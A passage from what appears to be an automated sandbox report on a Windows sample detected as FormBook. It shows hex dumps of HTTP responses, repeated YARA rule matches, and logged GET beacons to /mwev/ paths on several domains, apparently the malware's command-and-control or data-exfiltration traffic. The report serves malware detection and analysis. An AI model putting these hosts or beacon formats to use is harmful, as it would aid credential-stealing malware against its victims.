69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 02 Dec 2021 19:01:07 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be761-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 02 Dec 2021 19:01:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: wlanext.exe, 00000007.00000002.920741611.0000000003CA2000.00000004.00020000.sdmpString found in binary or memory: https://www.foxandmew.com/mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv
          Source: unknownDNS traffic detected: queries for: www.royallecleaning.com
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=HsmrIALTvXRwIzSnf5nMI/V00TunQUINtH1bLOqGnVursL/6Yec02BWx+TEJbBuPuFeE&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.royallecleaning.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=Y+Hyy1N7e+ROxQ1BzGerXtl/+e9k+2VYdpmZeNGMnmnYwBGoq47Ntyx8TFdOC4/xH+hS&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.scion-go-getter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=iTGszEHgBfgYRglEf8qTe/0GehEi8eYY5QDShU32F6t0wDyeZFMPJI0cijyvgJ5fvuvy&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.21yingyang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=muoWufO8p6lksAUPj07m8fqHwDrNKoj9M2hBle0NDwQN4kTZYCe/nJ8SwFL4fqBvjDWp&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.texascountrycharts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=/zd6oxG+H6qci+O+cHlZDp/zFP0nYcFn0YDhkjhJJtSXAtrcRYu0trJUidLUZZla0YBM&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.tikomobile.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=vthKUgsgoRJ92n81Fuh07g/ARRJh8nN5iXUIpLSVgoOHRdB6AKBPErPncdrss3E6nFAH&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.fulvousemollientplanet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=wD7IX5djK39N0mXOoKckCLddnCt/+mP/xVLK1b09pQyAIyzBpLPKZ8m7O34kMZ4xQV6J&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.experimentwithoutlimits.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=IXYNpvQ1BiZ44tShy9SgvoX4c9kgPxO5K/+6kCom7tZxGdFtiZvct/5RRpjh/yF5dNln&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.websitessample.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv+wAuDzmHDYSO236DISOvOLkKOKiYq/4R&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.foxandmew.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=IjrmxmCSNg9SW3Y0DfjHEVuIkvJ5tkiLJE48G3emnLXjviiyyOAbNkhdp+PdSxIUf+MM&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.9linefarms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mwev/?-Zf=4s7fstVSzLCadPpci11R7qAZUnePXrmWLsX7/7GiC0yrg0b/n74rqRMRm0/pECdGagYy&v0GTT=9rntXVQxPfS89pvp HTTP/1.1Host: www.rip-online.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: 1D4l9eR0W4.exe, 00000000.00000002.664916018.00000000015A0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1D4l9eR0W4.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
